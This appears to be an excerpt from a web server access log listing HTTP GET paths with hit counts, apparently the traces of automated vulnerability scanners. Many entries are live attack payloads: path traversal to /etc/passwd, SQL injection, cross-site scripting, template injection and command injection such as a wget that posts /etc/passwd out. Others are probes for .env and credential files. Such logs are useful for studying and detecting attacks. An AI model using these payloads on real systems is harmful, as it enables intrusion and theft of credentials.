1 | GET | /adm/file.cgi?next_file=%2fetc%2fpasswd |
HTTP/1.1 |
1 | GET | /adm_program/system/redirect.php?url=javascript://%250aalert(document.domain) |
HTTP/1.1 |
2 | GET | /admin-ng/login.html |
HTTP/1.1 |
1 | GET | /admin.back%3Cimg%2520src=x%2520onerror=alert%28document.domain%29%3E |
HTTP/1.1 |
1 | GET | /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s |
HTTP/1.1 |
2 | GET | /admin.php |
HTTP/1.1 |
3 | GET | /admin/.env.local |
HTTP/1.1 |
3 | GET | /admin/.env.production |
HTTP/1.1 |
3 | GET | /admin/.env.staging |
HTTP/1.1 |
6 | GET | /admin/.env |
HTTP/1.1 |
5 | GET | /admin/ |
HTTP/1.1 |
2 | GET | /admin/airflow/code?dag_id=example_passing_params_via_test_command&root |
HTTP/1.1 |
1 | GET | /admin/auth/login |
HTTP/1.1 |
1 | GET | /admin/cert_download.php?certfile=cert_download.php&file=pqpqpqpq.txt |
HTTP/1.1 |
2 | GET | /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(999999999)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA[.]CHARACTER_SETS+GROUP+BY+x)a)--%2b' |
HTTP/1.1 |
3 | GET | /admin/config.php |
HTTP/1.1 |
1 | GET | /admin/dashboard.php |
HTTP/1.1 |
1 | GET | /admin/error.log |
HTTP/1.1 |
1 | GET | /admin/errors.log |
HTTP/1.1 |
1 | GET | /admin/index.html |
HTTP/1.1 |
1 | GET | /admin/index.php?cmd=mkfile&name=2LM9c0tkVnG9y7rp0sprUj5wYk3.php&op=elfinder&p=ajax-ops&target=l1_Lw |
HTTP/1.1 |
1 | GET | /admin/index.php?cmd=mkfile&name=2LNn6NIgJpHvSRTARgGscqVFOnj.php&op=elfinder&p=ajax-ops&target=l1_Lw |
HTTP/1.1 |
1 | GET | /admin/index.php?file=/../../../../../../../../../../../etc/passwd&module=file_editor |
HTTP/1.1 |
3 | GET | /admin/index.php?page=home |
HTTP/1.1 |
2 | GET | /admin/index.php |
HTTP/1.1 |
1 | GET | /admin/install.php |
HTTP/1.1 |
1 | GET | /admin/install/install.php |
HTTP/1.1 |
1 | GET | /admin/log/error.log |
HTTP/1.1 |
1 | GET | /admin/login/?next=/admin/ |
HTTP/1.1 |
1 | GET | /admin/login |
HTTP/1.1 |
1 | GET | /admin/logs/error.log |
HTTP/1.1 |
1 | GET | /admin/logs/errors.log |
HTTP/1.1 |
1 | GET | /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 |
HTTP/1.1 |
1 | GET | /admin/view_car.php?id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ |
HTTP/1.1 |
2 | GET | /admin/views/ajax/autocomplete/user/a |
HTTP/1.1 |
2 | GET | /admin |
HTTP/1.1 |
1 | GET | /adminer?elastic=interact.sh&username |
HTTP/1.1 |
1 | GET | /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 |
HTTP/1.1 |
1 | GET | /administrator/ |
HTTP/1.1 |
1 | GET | /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /administrator/components/com_joommyadmin/phpmyadmin/ |
HTTP/1.1 |
1 | GET | /administrator/manifests/files/joomla.xml |
HTTP/1.1 |
1 | GET | /adminlogin |
HTTP/1.1 |
1 | GET | /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 |
HTTP/1.1 |
1 | GET | /agc/vicidial_mysqli_errors.txt |
HTTP/1.1 |
1 | GET | /airflow.cfg |
HTTP/1.1 |
2 | GET | /aj.html?a=devi |
HTTP/1.1 |
1 | GET | /ajax.php?bypass=Transcripts.php&modname=misc/../../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /ajax.php?entriesPerPage=15&f=getPipelineJobOrder&indexFile=1&isPopup=0&joborderID=50&page=0&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc |
HTTP/1.1 |
2 | GET | /ajax/networking/get_netcfg.php?iface=curl%20/ whoami`` |
HTTP/1.1 |
2 | GET | /alfresco/api/-default-/public/cmis/versions/1.1/atom |
HTTP/1.1 |
1 | GET | /alps/profile |
HTTP/1.1 |
1 | GET | /ampps-admin/index.php?act=login |
HTTP/1.1 |
1 | GET | /analytics/saw.dll?bieehome&startPage=1 |
HTTP/1.1 |
1 | GET | /android/app/google-services.json |
HTTP/1.1 |
1 | GET | /angular-cli.json |
HTTP/1.1 |
1 | GET | /anything_here |
HTTP/1.1 |
1 | GET | /apache-default/phpmyadmin/ |
HTTP/1.1 |
2 | GET | /apache.conf |
HTTP/1.1 |
1 | GET | /apc.php |
HTTP/1.1 |
1 | GET | /apc/apc.php |
HTTP/1.1 |
1 | GET | /api-docs/swagger.json |
HTTP/1.1 |
2 | GET | /api-docs/swagger.yaml |
HTTP/1.1 |
1 | GET | /api-third-party/download/extdisks../etc/passwd |
HTTP/1.1 |
1 | GET | /api.php?c=project&f=index&id=news&sort=1+and+extractvalue(1,concat(0x7e,md5(999999999)))+--+&token=1234 |
HTTP/1.1 |
3 | GET | /api/.env.local |
HTTP/1.1 |
3 | GET | /api/.env.production |
HTTP/1.1 |
3 | GET | /api/.env.staging |
HTTP/1.1 |
7 | GET | /api/.env |
HTTP/1.1 |
1 | GET | /api/2LNn65VX1l9wT6kv0BhpAagoZT5 |
HTTP/1.1 |
2 | GET | /api/_swagger_/ |
HTTP/1.1 |
1 | GET | /api/admin/config |
HTTP/1.1 |
2 | GET | /api/api-docs |
HTTP/1.1 |
2 | GET | /api/apidocs/swagger.json |
HTTP/1.1 |
1 | GET | /api/apidocs/swagger.yaml |
HTTP/1.1 |
1 | GET | /api/apidocs |
HTTP/1.1 |
2 | GET | /api/application.wadl |
HTTP/1.1 |
1 | GET | /api/config |
HTTP/1.1 |
1 | GET | /api/downloads?fileName=../../../../../../../../etc/passwd |
HTTP/1.1 |
2 | GET | /api/experimental/dags/example_trigger_target_dag/paused/false |
HTTP/1.1 |
1 | GET | /api/experimental/latest_runs |
HTTP/1.1 |
1 | GET | /api/experimental/patternfile?order=id%3Bselect(md5(999999999))&page=0&page_size=0 |
HTTP/1.1 |
2 | GET | /api/experimental/test |
HTTP/1.1 |
1 | GET | /api/geojson?url=file:///etc/passwd |
HTTP/1.1 |
1 | GET | /api/get-organizations?field=updatexml(1,version(),1)&p=123&pageSize=123&sortField&sortOrder&value=cfx |
HTTP/1.1 |
2 | GET | /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20) |
HTTP/1.1 |
2 | GET | /api/image/cover-upload?filename=../appsettings.json |
HTTP/1.1 |
2 | GET | /api/index.html |
HTTP/1.1 |
1 | GET | /api/jsonws/invoke |
HTTP/1.1 |
2 | GET | /api/jsonws |
HTTP/1.1 |
1 | GET | /api/profile |
HTTP/1.1 |
1 | GET | /api/search/attribute?tf_version=%27+and+(select%20pg_sleep(10))+ISNULL--&versionid=* |
HTTP/1.1 |
1 | GET | /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20md5(999999999)),0x7e),1)--%20 |
HTTP/1.1 |
1 | GET | /api/snapshots/:key |
HTTP/1.1 |
1 | GET | /api/spec/swagger.json |
HTTP/1.1 |
1 | GET | /api/sso/v2/sso/jwt?error_url=http[:]//interact[.]sh |
HTTP/1.1 |
1 | GET | /api/subscriber |
HTTP/1.1 |
2 | GET | /api/swagger-resources/restservices/v2/api-docs |
HTTP/1.1 |
1 | GET | /api/swagger-resources |
HTTP/1.1 |
1 | GET | /api/swagger-ui.html |
HTTP/1.1 |
2 | GET | /api/swagger-ui/api-docs |
HTTP/1.1 |
2 | GET | /api/swagger-ui/swagger.json |
HTTP/1.1 |
1 | GET | /api/swagger-ui/swagger.yaml |
HTTP/1.1 |
1 | GET | /api/swagger.json |
HTTP/1.1 |
1 | GET | /api/swagger.yaml |
HTTP/1.1 |
2 | GET | /api/swagger.yml |
HTTP/1.1 |
2 | GET | /api/swagger/index.html |
HTTP/1.1 |
1 | GET | /api/swagger/ui/index |
HTTP/1.1 |
1 | GET | /api/swagger_doc.json |
HTTP/1.1 |
1 | GET | /api/sys |
HTTP/1.1 |
1 | GET | /api/system/deviceinfo |
HTTP/1.1 |
2 | GET | /api/userrolelist/systemRoles?require-cfg.js |
HTTP/1.1 |
1 | GET | /api/users/admin/check |
HTTP/1.1 |
1 | GET | /api/v1/GetDevice |
HTTP/1.1 |
2 | GET | /api/v1/GetSrc |
HTTP/1.1 |
2 | GET | /api/v1/application.wadl |
HTTP/1.1 |
1 | GET | /api/v1/canal/config/1/1 |
HTTP/1.1 |
1 | GET | /api/v1/cluster/summary |
HTTP/1.1 |
1 | GET | /api/v1/data?after=-120&chart=system.cpu&dimensions=iowait&format=json&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&points=125 |
HTTP/1.1 |
1 | GET | /api/v1/info |
HTTP/1.1 |
1 | GET | /api/v1/namespaces/default/secrets |
HTTP/1.1 |
1 | GET | /api/v1/namespaces/default/services |
HTTP/1.1 |
2 | GET | /api/v1/namespaces |
HTTP/1.1 |
2 | GET | /api/v1/status/config |
HTTP/1.1 |
2 | GET | /api/v1/status/flags |
HTTP/1.1 |
2 | GET | /api/v1/swagger-ui/swagger.json |
HTTP/1.1 |
2 | GET | /api/v1/swagger-ui/swagger.yaml |
HTTP/1.1 |
2 | GET | /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name |
HTTP/1.1 |
1 | GET | /api/v2.0/systeminfo |
HTTP/1.1 |
1 | GET | /api/v2/application.wadl |
HTTP/1.1 |
2 | GET | /api/v4/projects |
HTTP/1.1 |
1 | GET | /api/v4/users/100 |
HTTP/1.1 |
1 | GET | /api/v4/users/15 |
HTTP/1.1 |
1 | GET | /api/v4/users/16 |
HTTP/1.1 |
1 | GET | /api/v4/users/34 |
HTTP/1.1 |
1 | GET | /api/v4/users/38 |
HTTP/1.1 |
1 | GET | /api/v4/users/3 |
HTTP/1.1 |
1 | GET | /api/v4/users/50 |
HTTP/1.1 |
1 | GET | /api/v4/users/60 |
HTTP/1.1 |
1 | GET | /api/v4/users/66 |
HTTP/1.1 |
1 | GET | /api/v4/users/69 |
HTTP/1.1 |
1 | GET | /api/v4/users/76 |
HTTP/1.1 |
1 | GET | /api/v4/users/87 |
HTTP/1.1 |
1 | GET | /api/v4/users/88 |
HTTP/1.1 |
1 | GET | /api/v4/users/89 |
HTTP/1.1 |
1 | GET | /api/v4/users/90 |
HTTP/1.1 |
1 | GET | /api/v4/users/91 |
HTTP/1.1 |
1 | GET | /api/v4/users/92 |
HTTP/1.1 |
2 | GET | /api/whoami |
HTTP/1.1 |
2 | GET | /api_docs |
HTTP/1.1 |
2 | GET | /api_smartapp/storage/ |
HTTP/1.1 |
1 | GET | /api |
HTTP/1.1 |
1 | GET | /apiclient/index.jsp |
HTTP/1.1 |
1 | GET | /apimanui/api-manager |
HTTP/1.1 |
3 | GET | /apis/.env.local |
HTTP/1.1 |
3 | GET | /apis/.env.production |
HTTP/1.1 |
3 | GET | /apis/.env.staging |
HTTP/1.1 |
3 | GET | /apis/.env |
HTTP/1.1 |
1 | GET | /apis/apps/v1/namespaces/default/deployments |
HTTP/1.1 |
1 | GET | /app.yaml |
HTTP/1.1 |
3 | GET | /app/.env.local |
HTTP/1.1 |
3 | GET | /app/.env.production |
HTTP/1.1 |
3 | GET | /app/.env.staging |
HTTP/1.1 |
3 | GET | /app/.env |
HTTP/1.1 |
3 | GET | /app/config.yml |
HTTP/1.1 |
4 | GET | /app/config/parameters.yml |
HTTP/1.1 |
1 | GET | /app/config/pimcore/google-api-private-key.json |
HTTP/1.1 |
2 | GET | /app/config/security.yml |
HTTP/1.1 |
1 | GET | /app/google-services.json |
HTTP/1.1 |
2 | GET | /app/kibana/ |
HTTP/1.1 |
1 | GET | /app/kibana |
HTTP/1.1 |
1 | GET | /app/login |
HTTP/1.1 |
2 | GET | /app/welcome/default/ |
HTTP/1.1 |
2 | GET | /appGet.cgi?hook=get_cfg_clientlist() |
HTTP/1.1 |
1 | GET | /apple-app-site-association |
HTTP/1.1 |
1 | GET | /appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Bsubmit%5D=Change%20Password&login%5Buse_curr%5D=1 |
HTTP/1.1 |
1 | GET | /appliance/login.ns |
HTTP/1.1 |
2 | GET | /application.wadl?detail=true |
HTTP/1.1 |
1 | GET | /application.wadl |
HTTP/1.1 |
1 | GET | /application.yaml |
HTTP/1.1 |
1 | GET | /application/logs/application.log |
HTTP/1.1 |
1 | GET | /application/logs/default.log |
HTTP/1.1 |
1 | GET | /apps |
HTTP/1.1 |
1 | GET | /arsys/shared/login.jsp |
HTTP/1.1 |
1 | GET | /artifactory/ui/repodata?deploy=true |
HTTP/1.1 |
1 | GET | /asd/../../../../../../../../etc/passwd |
HTTP/1.1 |
4 | GET | /asdf.php |
HTTP/1.1 |
2 | GET | /asp/Main.aspx |
HTTP/1.1 |
1 | GET | /assets/.gitignore |
HTTP/1.1 |
1 | GET | /assets/backend/elfinder/elfinder-cke.html |
HTTP/1.1 |
1 | GET | /assets/config.rb |
HTTP/1.1 |
1 | GET | /assets/elFinder-2.1.9/elfinder.html |
HTTP/1.1 |
2 | GET | /assets/file:%252f%252f/etc/passwd |
HTTP/1.1 |
2 | GET | /assets/npm-debug.log |
HTTP/1.1 |
1 | GET | /assets/other/service-account-credentials.json |
HTTP/1.1 |
2 | GET | /assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /assets/php/filebrowser/filebrowser.main.php?do=download&file=../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /assets/pubspec.yaml |
HTTP/1.1 |
1 | GET | /asynchPeople/ |
HTTP/1.1 |
1 | GET | /atg/bcc |
HTTP/1.1 |
1 | GET | /atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /audit/gui_detail_view.php?id=%5C&login=admin&token=1&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23 |
HTTP/1.1 |
1 | GET | /audit/gui_detail_view.php?id=%5C&login=shterm&token=1&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23 |
HTTP/1.1 |
1 | GET | /auth/?next=%2F |
HTTP/1.1 |
2 | GET | /auth/admin/master/console/ |
HTTP/1.1 |
2 | GET | /auth/admin |
HTTP/1.1 |
2 | GET | /auth/login/page |
HTTP/1.1 |
2 | GET | /auth/login?to=/92874%27alert(document.domain)//280 |
HTTP/1.1 |
1 | GET | /auth/realms/master/.well-known/openid-configuration |
HTTP/1.1 |
1 | GET | /authentication/login |
HTTP/1.1 |
1 | GET | /authentication |
HTTP/1.1 |
1 | GET | /authenticationendpoint/2lnn61or8ixxhqn4yptmvrrfcqs.jsp |
HTTP/1.1 |
1 | GET | /authenticationserverservlet |
HTTP/1.1 |
1 | GET | /author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1 |
HTTP/1.1 |
2 | GET | /authorization.do |
HTTP/1.1 |
1 | GET | /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com |
HTTP/1.1 |
1 | GET | /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com |
HTTP/1.1 |
2 | GET | /avatar_uploader.pages.inc?file=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /awstats.conf |
HTTP/1.1 |
1 | GET | /awstats.pl |
HTTP/1.1 |
1 | GET | /awstats/ |
HTTP/1.1 |
1 | GET | /awstats/awredir.pl?url=interact.sh |
HTTP/1.1 |
2 | GET | /awstats/data |
HTTP/1.1 |
1 | GET | /axis/ |
HTTP/1.1 |
1 | GET | /axis2/ |
HTTP/1.1 |
1 | GET | /azure-pipelines.yml |
HTTP/1.1 |
1 | GET | /babel.config.js |
HTTP/1.1 |
3 | GET | /backend/.env.local |
HTTP/1.1 |
3 | GET | /backend/.env.production |
HTTP/1.1 |
3 | GET | /backend/.env.staging |
HTTP/1.1 |
3 | GET | /backend/.env |
HTTP/1.1 |
2 | GET | /backend |
HTTP/1.1 |
1 | GET | /backup.sh |
HTTP/1.1 |
2 | GET | /backup.sql |
HTTP/1.1 |
3 | GET | /backup.wp-config.php |
HTTP/1.1 |
3 | GET | /backup/.env.local |
HTTP/1.1 |
3 | GET | /backup/.env.production |
HTTP/1.1 |
3 | GET | /backup/.env.staging |
HTTP/1.1 |
3 | GET | /backup/.env |
HTTP/1.1 |
1 | GET | /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php |
HTTP/1.1 |
2 | GET | /backup2.cgi |
HTTP/1.1 |
1 | GET | /backupmgt/localJob.php?session=failwget http[:]//; |
|
3 | GET | /backupsettings.dat |
HTTP/1.1 |
2 | GET | /badging/badge_print_v0.php?tpl=../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /base/static/c:/windows/win.ini |
HTTP/1.1 |
2 | GET | /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ |
HTTP/1.1 |
1 | GET | /base_import/static/c:/windows/win.ini |
HTTP/1.1 |
1 | GET | /beans |
HTTP/1.1 |
1 | GET | /behat.yml.dist |
HTTP/1.1 |
1 | GET | /behat.yml |
HTTP/1.1 |
3 | GET | /beta/.env.local |
HTTP/1.1 |
3 | GET | /beta/.env.production |
HTTP/1.1 |
3 | GET | /beta/.env.staging |
HTTP/1.1 |
6 | GET | /beta/.env |
HTTP/1.1 |
1 | GET | /bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script> |
HTTP/1.1 |
1 | GET | /bin.tidy.infinity.json |
HTTP/1.1 |
1 | GET | /bin/querybuilder.feed |
HTTP/1.1 |
2 | GET | /bin/querybuilder.json.;%250aa.css?p.hits=full&p.limit=-1&path=/home |
HTTP/1.1 |
1 | GET | /bin/querybuilder.json.;%250aa.css?p.hits=full&property=rep:authorizableId&type=rep:User |
HTTP/1.1 |
2 | GET | /bin/querybuilder.json.css?p.hits=full&p.limit=-1&path=/etc |
HTTP/1.1 |
2 | GET | /bin/querybuilder.json.css?p.hits=full&p.limit=-1&path=/home |
HTTP/1.1 |
1 | GET | /bin/wcm/search/gql.json/a.1.json?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | /bin/wcm/search/gql.json/a.4.2.1...json?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | /bin/wcm/search/gql.json/a.css?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | /bin/wcm/search/gql.json/a.html?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | /bin/wcm/search/gql.json/a.ico?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | /bin/wcm/search/gql.json/a.js?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | /bin/wcm/search/gql.json/a.png?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | /bin/wcm/search/gql.json;%250aa.css?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | /bin/wcm/search/gql.json;%250aa.html?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | /bin/wcm/search/gql.json;%250aa.ico?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | /bin/wcm/search/gql.json;%250aa.js?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | /bin/wcm/search/gql.json;%250aa.png?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | /bin/wcm/search/gql.json?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | /bin/wcm/search/gql.servlet.json?pathPrefix&query=type:base%20limit:..1 |
HTTP/1.1 |
1 | GET | /bitbucket-pipelines.yml |
HTTP/1.1 |
1 | GET | /bitbucket/repos?visibility=public |
HTTP/1.1 |
2 | GET | /bitrix/admin/ |
HTTP/1.1 |
2 | GET | /bitrix/components/bitrix/mobileapp.list/ajax.php/?AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&items%5BITEMS%5D%5BID%5D=<a+href=\"/*\">*/%29%7D%29function+__MobileAppList()%7Balert(1)%7D//>&items%5BITEMS%5D%5BTOGGLABLE%5D=test123 |
HTTP/1.1 |
1 | GET | /bitrix/redirect.php?event1&event2&event3=download&goto=https[:]//interact[.]sh |
HTTP/1.1 |
1 | GET | /bitrix/redirect.php?event1=select_product_t1&event2=contributions&goto=https[:]//interact[.]sh&site_id=s1 |
HTTP/1.1 |
1 | GET | /bitrix/rk.php?event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https[:]//interact[.]sh&id=84&site_id=n1 |
HTTP/1.1 |
2 | GET | /blast/nph-viewgif.cgi?../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php |
HTTP/1.1 |
1 | GET | /blog/wp-content/plugins/1-flash-gallery/ |
HTTP/1.1 |
1 | GET | /blog/wp-content/themes/haberadam/api/mobile-info.php?id |
HTTP/1.1 |
1 | GET | /boafrm/formWlanRedirect?redirect-url=http[:]//interact[.]sh&wlan_id=1 |
HTTP/1.1 |
1 | GET | /bolt/login |
HTTP/1.1 |
1 | GET | /bonita/portal/themeResource?location=Windows/win.ini&theme=portal/../../../../../../../../../../../../../../../../ |
HTTP/1.1 |
1 | GET | /bonita/portal/themeResource?location=etc/passwd&theme=portal/../../../../../../../../../../../../../../../../ |
HTTP/1.1 |
2 | GET | /browser/ |
HTTP/1.1 |
1 | GET | /calendar/admin/cal_login.php |
HTTP/1.1 |
1 | GET | /calendar/calendar_form.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E |
HTTP/1.1 |
2 | GET | /calendarix/admin/cal_login.php |
HTTP/1.1 |
1 | GET | /camunda/app/welcome/default/ |
HTTP/1.1 |
1 | GET | /carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F |
HTTP/1.1 |
1 | GET | /carbon/admin/login.jsp |
HTTP/1.1 |
1 | GET | /card_scan.php?CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&No=0000&ReaderNo=0000 |
HTTP/1.1 |
1 | GET | /cas/login |
HTTP/1.1 |
1 | GET | /catalog-portal/ui/oauth/verify?deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d&error |
HTTP/1.1 |
1 | GET | /category_view.php |
HTTP/1.1 |
1 | GET | /ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /ccms/dashboard.php |
HTTP/1.1 |
1 | GET | /cdn-cgi/image/width/https[:]// |
HTTP/1.1 |
2 | GET | /centreon/index.php |
HTTP/1.1 |
1 | GET | /cf_scripts/scripts/ajax/package/cfajax.js |
HTTP/1.1 |
1 | GET | /cfcache.map |
HTTP/1.1 |
1 | GET | /cfg/login |
HTTP/1.1 |
1 | GET | /cfide-scripts/ajax/package/cfajax.js |
HTTP/1.1 |
1 | GET | /cfide/administrator/images/background.jpg |
HTTP/1.1 |
1 | GET | /cfide/administrator/images/mx_login.gif |
HTTP/1.1 |
1 | GET | /cfide/componentutils/login.cfm |
HTTP/1.1 |
1 | GET | /cfmx/CFIDE/scripts/ajax/package/cfajax.js |
HTTP/1.1 |
1 | GET | /cgi-bin/ALFA_DATA/alfacgiapi/ |
HTTP/1.1 |
1 | GET | /cgi-bin/ExportAllSettings.sh |
HTTP/1.1 |
1 | GET | /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd |
HTTP/1.1 |
1 | GET | /cgi-bin/ |
HTTP/1.1 |
1 | GET | /cgi-bin/apcupsd/multimon.cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/awstats/awredir.pl?url=interact.sh |
HTTP/1.1 |
2 | GET | /cgi-bin/broker?BG=%23FFFFFF&DATASET=targetdataset&TEMPFILE=Unknown&_DEBUG=131&_DEBUG=131&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&_PROGRAM=sample.webcsf1.sas&_SERVICE=targetservice&_WEBOUT=test&bgtype=COLOR&csftyp=classic,+ssfile1%3d/etc/passwd&style=a+tcolor%3dblue&sysparm=test |
HTTP/1.1 |
1 | GET | /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /cgi-bin/ck/domenu.cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/common/login/webLogin |
HTTP/1.1 |
2 | GET | /cgi-bin/config.exp |
HTTP/1.1 |
1 | GET | /cgi-bin/cosmobdf.cgi?function=0 |
HTTP/1.1 |
2 | GET | /cgi-bin/cosmobdf.cgi?function=1 |
HTTP/1.1 |
1 | GET | /cgi-bin/downloadFlile.cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/getagent.cgi?type=s&xxxx |
HTTP/1.1 |
1 | GET | /cgi-bin/guestimage.html |
HTTP/1.1 |
1 | GET | /cgi-bin/home |
HTTP/1.1 |
1 | GET | /cgi-bin/html/login.html |
HTTP/1.1 |
1 | GET | /cgi-bin/jarrewrite.sh |
HTTP/1.1 |
2 | GET | /cgi-bin/kerbynet?Action=StartSessionSubmit&PW&User='%0acat%20/etc/passwd%0a' |
HTTP/1.1 |
2 | GET | /cgi-bin/log.cgi |
HTTP/1.1 |
2 | GET | /cgi-bin/login?LD_DEBUG=files |
HTTP/1.1 |
1 | GET | /cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1 |
HTTP/1.1 |
1 | GET | /cgi-bin/luci/web |
HTTP/1.1 |
1 | GET | /cgi-bin/luci |
HTTP/1.1 |
2 | GET | /cgi-bin/mj_wwwusr?extra=/../../../../../../../../etc/passwd&func=help&list=GLOBAL&passw&user |
HTTP/1.1 |
1 | GET | /cgi-bin/multimon.cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/nagios3/status.cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/nobody/Machine.cgi?action=get_capability |
HTTP/1.1 |
1 | GET | /cgi-bin/printenv.pl |
HTTP/1.1 |
1 | GET | /cgi-bin/printenv |
HTTP/1.1 |
1 | GET | /cgi-bin/qmailadmin/qmailadmin |
HTTP/1.1 |
1 | GET | /cgi-bin/qmailadmin |
HTTP/1.1 |
2 | GET | /cgi-bin/slogin/login.py |
HTTP/1.1 |
1 | GET | /cgi-bin/test-cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/test/test.cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/touchlist_sync.cgi?IP=wget+http[:]// |
HTTP/1.1 |
2 | GET | /cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password |
HTTP/1.1 |
1 | GET | /cgi-bin/upload/web-ftp.cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/wapopen?B1=OK&FILECAMERA=../../etc/passwd%00&NAME=admin&NO=CAM_16&ONLOAD_HTML=onload.htm&PIC_SIZE=0&PWD=admin&REFRESH_HTML=auto.htm&REFRESH_TIME=Auto_00&STREAMING_HTML=streaming.htm |
HTTP/1.1 |
2 | GET | /cgi-bin/weblogin.cgi?username=admin'cat+/etc/passwd |
HTTP/1.1 |
2 | GET | /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo |
HTTP/1.1 |
2 | GET | /cgi-bin/xweb500.cgi |
HTTP/1.1 |
1 | GET | /cgi-ssl/qmailadmin/qmailadmin |
HTTP/1.1 |
1 | GET | /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%272LNn6UlVWf6fLmxwL3PHRaktW02%27)%3C/script%3E |
HTTP/1.1 |
1 | GET | /cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /changePassword?username=administrator |
